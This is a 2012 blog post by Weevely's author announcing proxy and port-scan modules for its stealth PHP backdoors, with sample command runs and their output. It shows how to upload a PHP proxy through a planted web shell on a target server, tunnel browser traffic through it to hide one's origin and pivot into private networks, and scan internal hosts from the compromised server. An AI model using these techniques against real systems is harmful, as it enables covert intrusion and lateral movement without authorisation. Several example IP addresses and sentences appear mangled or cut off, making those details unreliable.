Weevely as HTTP proxy and port scanner
2012-05-11 19:20:40 » hacking, networking, pentesting, php, pivoting, portscan, proxy, security, Weevely
I've added in Weevely suggestive modules to interact with remote networks.
Proxy module run a local HTTP proxy that tunnels your traffic through target web server. It locally spawn proxy at port 8080, by default. Setting
http://localhost:8080 as proxy at your favourite browser you anonymize your traffic and eventually pivot toward private networks accessible from web server.
1 2 3 4 5 6 7 8
user@local$ ./weevely.py http://www.target.com/weev.php password :net.proxy Weevely 0.6 - Generate and manage stealth PHP backdoors Emilio Pinna 2011-2012 [net.proxy] PHP proxy uploaded as 'http://www.target.com/weepro.php' [net.proxy] Next times skip install running ':net.proxy rurl=http://www.target.com/weepro.php' [net.proxy] Proxy running. Set 'http://127.0.0.1:8080' as HTTP proxy
:show net.proxy to show all configurable options.
Scan module perform simple port scan through remote web server. Host entry supports different formats: as single host (es.
www.google.it), as single IP (es.
126.96.36.199), as IP range (es.
188.8.131.52-184.108.40.206) as network (es.
220.127.116.11/24), as interface (es.
eth3). Ports support single port (es.
80) or multiple ones (es
This function is really useful to perform scan toward internal network and eventually connect to them using net.proxy as pivot.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
user@local$ ./weevely.py http://www.target.com/weev.php password :net.scan eth9 80 Weevely 0.6 - Generate and manage stealth PHP backdoors Emilio Pinna 2011-2012 [net.scan] Scanning 1 ports of 256 hosts using 26 requests (10 connections per request) .......... OPEN: 18.104.22.168:80 .......... .......... .......... .......... .......... .......... OPEN: 22.214.171.124:80 ..........
:show net.scan to show all configurable options. To get informations about remote network interfaces and relative network addresses, use new module
This modules are available in Weevely git repository and in 0.7 version.